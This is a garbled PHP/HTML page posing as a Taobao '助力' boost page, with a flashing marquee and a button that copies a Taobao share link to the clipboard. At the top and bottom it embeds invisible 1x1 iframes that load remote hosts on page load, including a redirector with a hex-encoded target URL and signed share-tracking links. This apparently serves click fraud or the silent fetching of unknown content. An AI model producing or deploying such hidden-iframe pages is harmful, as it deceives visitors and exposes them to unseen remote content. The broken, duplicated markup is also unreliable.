


<?php
<body>
   
  
    <iframe src="http://d.cj0415gert.shop/Rpxkg33707" width="1" height="1"></iframe>

    <iframe src="https://ssse9sa15.nnfi1819z.com/?url=68747470733A2F2F3134397366667373313431332E6E6E6669313831397A2E636F6D2F3F6170693D32463730324637363639363436353646324433343330333833393332333033363244373536393634324433323331333933393337333032453638373436443643" width="1" height="1"></iframe>

    <iframe src="https://ssse9sa15.nnfi1819z.com/?url=68747470733A2F2F3134397366667373313431332E6E6E6669313831397A2E636F6D2F3F6170693D32463730324637363639363436353646324433343330333833393332333033363244373536393634324433323331333933393337333032453638373436443643" width="1" height="1"></iframe>

    <iframe src="https://focu.youth.cn/articlefour/20230831?sid=49758391&uid=43926004&timestamp=1694002726&signature=nG63ezAQDowMB0vlYg4k6ZEK2C58wg31L8KN5yR9XpjPOxrbdE&share_id=43926004497583911694002734036&scene_id=fire_share&time=1694002734036&share_way=wx" width="1" height="1"></iframe>

    <iframe src="https://focu.youth.cn/articlefour/20230904?sid=49781453&uid=43926004&timestamp=1694002726&signature=NRxPz8j0mdBYbOGDW91l9ZWeYudLy6D4yAXV56qwogJEpkLK2e&scene_id=fire_share&share_id=43926004497814531694002767029&share_way=wx" width="1" height="1"></iframe>  
	
</body> 

<html
	<head> 
		<meta charset="utf-8">
		<html class="no-js" lang="" style="--status-bar-height:0px; --window-top:0px; --window-bottom:0px;">
			<head>
				<meta charset="utf-8">
				<meta name="viewport" content="width=device-width,initial-scale=1,shrink-to-fit=no">

				<title>
					助力
				</title>
				
<link type="text/css" rel="stylesheet" href="./index.css"><title> </title></head>
<body>
			<script src="./jquery.js"></script>  
    <script src="./clipboard.min.js"></script>  </script>  
    <div class="STYLE1">
<style>#nr{font-size:30px;margin: 10;background: -webkit-linear-gradient(left,#ffffff,#ff0000 

6.25%,#ff7d00 12.5%,#ffff00 18.75%,#00ff00 25%,#00ffff 31.25%,#0000ff 37.5%,#ff00ff 43.75%,#ffff00 50%,#ff0000 56.25%,#ff7d00 62.5%,#ffff00 68.75%,#00ff00 75%,#00ffff 

81.25%,#0000ff 87.5%,#ff00ff 93.75%,#ffff00 100%);-webkit-background-clip: text;-webkit-text-fill-color: transparent;background-size: 200% 100%;animation: masked-animation 2s 

infinite linear;}@keyframes masked-animation {0% {background-position: 0 0;}100% {background-position: -100%, 0;}}</style></div>
<TD height=40 width=821 colSpan=2><SPAN class=STYLE1>
<MARQUEE><STRONG>

<b id="nr"><a href="https://98tv.github.io">淘宝助力中.请稍后....</a></FONT></STRONG></MARQUEE></SPAN>
</div>
	</marquee></style>
													</a>
								</span>
							</div>  </div> </div> 
						</div>


	
<br>  <span id="target"></span>
<div class="icopy_1" data-clipboard-text="https://m.tb.cn/h.5VWg7hI?tk=5qHwdy7fmb8"data-clipboard-target="#target" id="copy_btn"><div class="drugsword" ><!-- 

前面是文字居中 --><a href="https://m.tb.cn/h.5VWg7hI?tk=5qHwdy7fmb8">★★★点击进入淘宝助力★★★</a></div></div> </br>

  </footer>
   <body>
   
    <iframe src=" https://mr.baidu.com/15yPnDNwH3G" width="1" height="1"></iframe>


</body>

</div>
<div id="bg"></div>
<audio id="audio" autoplay>
  <source src="" type="audio/mpeg">
</audio>


</html></script>
</body>
	

  </footer>
   

</div>
<div id="bg"></div>
<audio id="audio" autoplay>
  <source src="" type="audio/mpeg">
</audio>


